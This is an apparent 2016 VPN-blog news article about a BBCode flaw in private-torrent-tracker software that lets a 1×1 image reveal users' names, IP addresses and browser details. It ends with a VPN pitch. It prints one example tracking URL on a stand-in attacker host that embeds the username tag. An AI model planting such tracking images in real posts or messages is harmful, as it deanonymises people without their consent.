VPN Articles and News

Security Flaw In Portal Software Exposes Personal Information Of BitTorrenting Users

By
Wednesday, October 19th, 2016


A security researcher recently discovered a critical flaw in a popular portal software that is being used by lots of torrenting websites. After making the discovery, the researcher contacted TorrentFreak, one of the topmost destinations for all news related to bittorrenting; and disclosed how he was able to collect personal information from the staff as well as users of several different private torrenting sites (also called as private trackers). While the anonymous researcher did not divulge much information regarding which sites were affected by the vulnerability, he did reveal that SceneAccess, one of the most popular private trackers on the web; was also vulnerable to it.

As you might be already aware, most torrenting sites come in one of the following two forms: a) Public portals (for example, KickAssTorrents and ThePirateBay) and b) Private Trackers. The major difference between the two is that while public bittorrenting sites can be accessed by anyone, private trackers are accessible only to the registered members of the site. What’s more, joining a private torrenting site is extremely difficult since it requires an invitation (which can only be created and supplied by the existing members of the site). The seemingly complicated process was designed to keep law enforcement officials and copyright holders at a distance. But as the anonymous researcher has proven, the close-knit community approach used by private torrenting portals is not totally foolproof.

The vulnerability affects BBCode (which stands for Bulletin Board Code) which happens to be a crucial part of the portal software in question. BBCode is widely used by internet forums and many other types of websites for text formatting as well simplifying insertion of emojis and pictures into webpages and forum posts. As per the security researcher, the flaw affects the BBCode [you] that is used for inserting a user’s login name on a webpage. When this particular BBCode is appended to a URL and the name of an image (example, http:// attackwebsite .com/pic.php?u=[you].jpg), it generates a 1×1 pixel image as well as captures sensitive information like browser name/version, operating system and IP address of the user.

In order to test the vulnerability, the researcher posted the compromised version of BBCode on several different private bittorrenting websites. In addition, he sent private messages (containing the BBCode) to hundreds of users and staff members of those websites. In no time, the researcher was able to gather a large amount of personal and sensitive information that could be mapped to users of a particular website. It is thus clear that this vulnerability could be exploited by law enforcement officials to gather data from the users of private bittorrenting websites.

For users who love to download or share stuff via torrents, the researcher had a piece of advice. He recommends subscribing to a trustworthy VPN or seedbox service that comes with a zero-log policy. Most renowned VPN providers have torrent-friendly servers where IPs are shared between hundreds or even thousands or users. What’s more, these torrenting servers are located in countries where bittorrenting is not illegal. So the bottom-line is simple; if you love torrenting, subscribe to a VPN service to avoid leaking your personal information through the above and as yet undiscovered errors.


October 19, 2016
Comments

Leave a Reply

Your email address will not be published. Required fields are marked *


2 + 2 =